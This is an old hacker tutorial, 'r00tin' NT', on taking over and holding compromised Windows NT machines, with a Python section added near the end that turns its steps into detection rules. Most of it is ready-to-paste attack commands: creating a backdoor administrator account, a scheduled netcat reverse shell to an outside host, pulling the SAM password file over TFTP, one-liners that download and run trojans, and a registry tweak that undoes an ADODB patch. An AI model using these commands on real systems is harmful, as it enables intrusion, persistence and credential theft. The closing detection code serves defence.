...                                     
                      ouuuuuZHH@Auuuuuu23;                           
                .:38A@NMMMMMNMMMMN22AMMMMNHHHH@A77;:                 
              ,;88bU78u338@HHHUu333ZEMMMMMMMMMMMMMNHU:               
            7bE877:   .,;27,   .;uu@MNR8888U8@MMMMMMMMUo             
         .;283.           :;72883,,,:;o732uR2RMMMMMMMMMNR.           
        ,2E2,          .: ;;:    .28b822222222222RNMMMHRAAUo         
       7A8                 .,2.o2;      72228@MMMMMMMME8uHMM@7       
     .oA2,                  .;    .,72ubRU2;;;;322b@EEb3;oRNMN:.     
    .;H,                       ,::,7:       8bAH2223   ;8oo38MH2.    
   ;u8                     :oo23:     .2u8bbo,   o2228Z7 ,  :AMMU.   
  ::.                     ,:::    . ;u8;;,  :;;;bU2;;..;Z@;  .NMNR   
  H;                              ,      :ubUZ3;  .;8::,.22;.;HNMH   
;HZ,                                         ;oo8Z;    .. RNA:ZEMH   
2M                                           ,::      oZZ8Z8U8ENMH   
2M                                                       ;.   MMMH    C:\> r00tin' NT
7M         .                                    ,oAMMMRZ22,   ZEMH    C:\> illwill
;M        .8bAb,                              .7@MMMMMMMMM@8;  ;bHo.  C:\> xillwillx@yahoo.com
,uU:         ;bMUo.                           7MMMMMMMMMMMMMH8  3MM7. C:\> http://illmob.org
  Ho.         :UU@Eu.              7o:        7MMMMNEMNNMMMMMM  7EM@o 
  ;U2          .2AHME;.       ,ZRRRNMHR,.     ;MMMHEAHEEMMMMMN  ,uMM3
   u8u        .;  3MMM3     .8NMMMMMMMMMA3.   .3MMMMHRHMMMMME;  3MMA7
    ZH7           ,2MM3    78MMMMMMMMMMMMMH7    .ZR@MMMMMHR3.  ;bMM: 
    ,o@u:        .,;MM2    ZMMMMMMMMMMMMMMMN,     .,77777;.   ,AMN2. 
      .EA3      88ZuHMb7   2HMMMMMMMMMMMMMMM,                :MME2   
       .;ZRu3:  .  ,EA7    7bMMMMMMR@N@HMMNU.  :NE2.       2@NMb;    
         .:7bAb8,. .3.      ,HNMMMMMMN@HHU;     MMHA       7UMZ;     
              .3uZ8bH,        o2UMMMMHu3:       uHMH7     ,8NM       
                 ,ZMR.           .....           ...       2@@       
                  ,2RZ;...     .. ......            . .,;. :8M       
                    7ZRHMMbuuub@@bUAREHMUo  .288uuuu2;2AMH8RNR       
                      .,,,,,,,3bE@NNNNMNMNE7Eb8NMNN@   2M@o,,.       
                                .:33333;ouU@NRRHN2oo7:ZE@7.          
                                             .78;.   ,;:

Tutorial started fall of 2003.

So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt'
and you don't know what the fuck a command prompt is cuz you don't know shit about DOS
and can't do anything without a pretty point-n-click GUI interface, and you need to get your
UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.

+++ r00tin' NT
  - 0x01. The Basics
	+ What are net commands?
	+ What are some net commands?
	+ What is NetBIOS?
	+ Creating a local admin account.
	+ How to transfer files to and from.
	+ How do I execute those files remotely?


0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net commands exactly? Net commands are commands used to show information about
a server or network, which can include information on the servers, networks, shares, and connections.
Other net commands let you edit user accounts, groups, and other configuration
settings.


0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands that you can use to view server info.
Some of these would include the ever popular NET use, NET share and NET view. But these
aren't the only net commands available. There is a wide variety of net commands, and they are as follows:

	- NET Accounts			- NET Print	
	- NET Computer			- NET Send
	- NET Config Server		- NET Session
	- NET Config Workstation	- NET Share
	- NET Continue			- NET Statistics Server
	- NET File			- NET Statistics Workstation
	- NET Group			- NET Stop 
	- NET Help			- NET Time
	- NET Helpmsg			- NET Use
	- NET Localgroup		- NET User
	- NET Name			- NET Ver
	- NET Pause			- NET View
	
Net commands are a great way to spy on hacked Windows NT servers because you're checking on the network's
status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use, because each
does a certain thing that can be used for attacking. NET View displays a list of resources being shared on
the attacked computer. NET Share displays information about all the resources being shared on the
attacked computer, and can also be used to create network shares. Last but not least, NET Use displays a
list of connected computers and also has options for connecting to and disconnecting from previously made
shares. With those 3 commands, you have the ability to do an attack called NetBIOS hacking.


0x01. The Basics - Creating a local admin account and a backup shell.
`````````````````````````````````````````````````````````````````````
First off, I always start off with making myself an admin on the computer just in case the shell is lost.
Add a user and put it in the admin group:
	net user [username] [password] /add
	net localgroup administrators [username] /add
		( C:\WINNT\System32>net user GOD 0wned /add  )
		( C:\WINNT\System32>net localgroup administrators GOD /add  )

***From muts from whitehat.co.il 8/19/04
Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed.
There's nothing worse than losing the only single connection to a penetrated machine…
I did this using the "at" command, sending myself a NetCat shell every 15 minutes.
I found myself smiling every 15 minutes.

   Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.

   C:\WINDOWS>time
   time
   The current time is:  0:18:13.01
   Enter the new time:

   C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
   at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
   Added a new job with job ID = 1




0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files  :)
Here are some good methods of transferring files that I use:

1.	Open the C: drive up for file sharing/transferring
		C:\>NET SHARE shareME=C:
	which u can connect to in your browser window as \\victimsIP\shareME
	or type in YOUR dos prompt
		C:\>NET USE x: \\VICTIMip\shareME /user:GOD

2. 	TFTP transfers  (u need to have a TFTP server running on your computer) 
          http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
	         TFTP [-i] YOURIP [GET | PUT] source [destination]
	C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS

3.	from a command prompt, echo ftp commands into a script file and run ftp against it
	(with -n there is no auto-login, so the script supplies the username and then the password on its own line;
	 the session output goes to c:\$$.tmp, and both temp files get deleted afterward)
	echo user [username] >>c:\$.tmp
	echo [password] >>c:\$.tmp
	echo lcd c:\windows >>c:\$.tmp
	echo binary >>c:\$.tmp
	echo get [file] >>c:\$.tmp
	echo quit >>c:\$.tmp
	ftp -v -i -n -s:c:\$.tmp [ftp_server] >c:\$$.tmp
	
	del c:\$.tmp
	del c:\$$.tmp

4. I have created a commandline webdownloader which allows you to grab a file from a website and execute it.
   It's more reliable when transferring files (ftp servers have timeouts, TFTP uses UDP packets so it fails a lot).
   http://illmob.org/files/illmob/cmdget.zip
   u need to get it onto the server using the above choices, then you can use it normally:
        cmdget http://blah.com/trojan.exe c:\0wned.exe 
   "well how would I get your exe onto the hacked server, illwill you dumbass?" you might ask.
   Well, you could use this program brainbuster made... basically it's a GUI front-end that creates a debug script
   which you can paste into a shell line by line; that creates a .bat file which recompiles the script into an .exe.
    http://illmob.org/files/0day/exe2txt.zip

  ***Added from 101 on GSO forums 5/31/04
       A small tip now if you wanna use SecureCRT in listening mode to be able then to copy paste the huge .txt without problems:
           -*example*-
           your localip = 192.168.0.2
           run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
           With SecureCRT, do a simple telnet connection on 192.168.0.2:12345 
           (you'll have a shell of course on your own computer through SecureCRT)
           Open now another listening netcat2 through this local sCRT shell, you'll be able 
           finally to copy paste this huge txt if a victim spawns a shell to this netcat2
  *****


*I would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it,
     like file transfers.. you would start nc listening on a port on the server, and then on your computer:
          c:\>nc (vic_ip) (vic_port) < file.exe

-------------------- SNIP----------------------

echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs

------------------END SNIP----------------------

oh they patched their system for the ADODB stream? ha!
just paste this simple fix into the shell first
and you'll be able to do it in no time

-------------------- SNIP----------------------
echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg
------------------END SNIP----------------------




Method #2 ftp downloading
change ftp.blah.com to your own ftp server (plus directory) and put in your username/pass

-------------------- SNIP----------------------

echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com >c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp

------------------END SNIP----------------------



Method #3 tftp downloading
you need a tftp server running on your own machine
change yourserver.com to your ip or dns name

-------------------- SNIP----------------------

tftp -i yourserver.com get yourfile.exe && start yourfile.exe
------------------END SNIP----------------------


0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
   Having trouble trying to execute files remotely? 
   Try PSEXEC  http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
       psexec -u [username] -p [password] [command]
   if I created a user "GOD" with the password "0wn3d":
      C:\>psexec -u GOD -p 0wn3d blah.exe
   or if you wanna have their TFTP connect back to u and retrieve a file:
       c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
       
       NOTE: Psexec will only work if you add an administrator user first, 
             and if the computer doesn't have remote administration disabled 
             or one of the ports firewalled off. 
             Or try Remoxec http://securityfriday.com/ToolDownload/Remoxec/remoxec_doc.html
             Remoxec executes a program using DCOM. Just supply an IP, USER, PASS, and the EXE 
             you wanna execute.
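Flipping this around to the defender's side: an added example (not part of illwill's text) that turns the steps above into detection rules and runs them over constructed process command lines. It assumes you already collect process creation command lines (Security event 4688 with command-line auditing, or Sysmon Event ID 1); the sample lines and rule names are made up for this illustration.

```python
import re

# Constructed sample process command lines (what a 4688 event or Sysmon
# Event ID 1 records); made up for this example, not taken from a real host.
SAMPLE_CMDLINES = [
    r"net user GOD 0wned /add",
    r"net localgroup administrators GOD /add",
    r'at 0:19 "nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe"',
    r"cmd /c echo user USERNAME >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com",
    r"cscript //Nologo /B c:\dl.vbs",
    r"regedit /s c:\fix.reg",
    r"net share shareME=C:",
    r"tftp -i 10.0.0.5 get yourfile.exe",
    r"notepad.exe c:\notes.txt",
]

# One regex per technique from the tutorial, keyed by what the rule observes.
RULES = {
    "local_account_added": re.compile(r"\bnet\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I),
    "added_to_administrators": re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "scheduled_shell_via_at": re.compile(r"\bat\s+\d{1,2}:\d{2}\b.*-e\s+cmd(?:\.exe)?\b", re.I),
    "ftp_scripted_session": re.compile(r"\bftp\b.*\s-s:", re.I),
    "cscript_runs_vbs": re.compile(r"\bcscript\b.*\.vbs\b", re.I),
    "silent_reg_import": re.compile(r"\bregedit\b.*\s/s\b", re.I),
    "drive_root_shared": re.compile(r"\bnet\s+share\s+\S+=[a-z]:\\?\s*$", re.I),
    "tftp_binary_get": re.compile(r"\btftp\b.*\s-i\b.*\bget\b", re.I),
}

def classify(cmdline):
    """Labels of every rule that matches one command line, sorted."""
    return sorted(label for label, rx in RULES.items() if rx.search(cmdline))

def scan(cmdlines):
    """Map each flagged command line to its labels; clean lines are left out."""
    return {line: classify(line) for line in cmdlines if classify(line)}

def admin_created_then_elevated(cmdlines):
    """True once a 'net user /add' is followed by 'net localgroup administrators /add'."""
    seen_user_add = False
    for line in cmdlines:
        labels = classify(line)
        seen_user_add = seen_user_add or "local_account_added" in labels
        if seen_user_add and "added_to_administrators" in labels:
            return True
    return False

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(labels):28} <- {line}")
    print("admin account chain seen:", admin_created_then_elevated(SAMPLE_CMDLINES))
```

Each rule on its own is noisy on an admin's box; the ordered pair in admin_created_then_elevated, or several labels from one host within minutes, is what merits an alert.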



This is a working textfile that I have been kicking around; I'll keep adding to it sooner or later when I get some more time.
-peace
illwill

    Source: geocities.com/yogsotho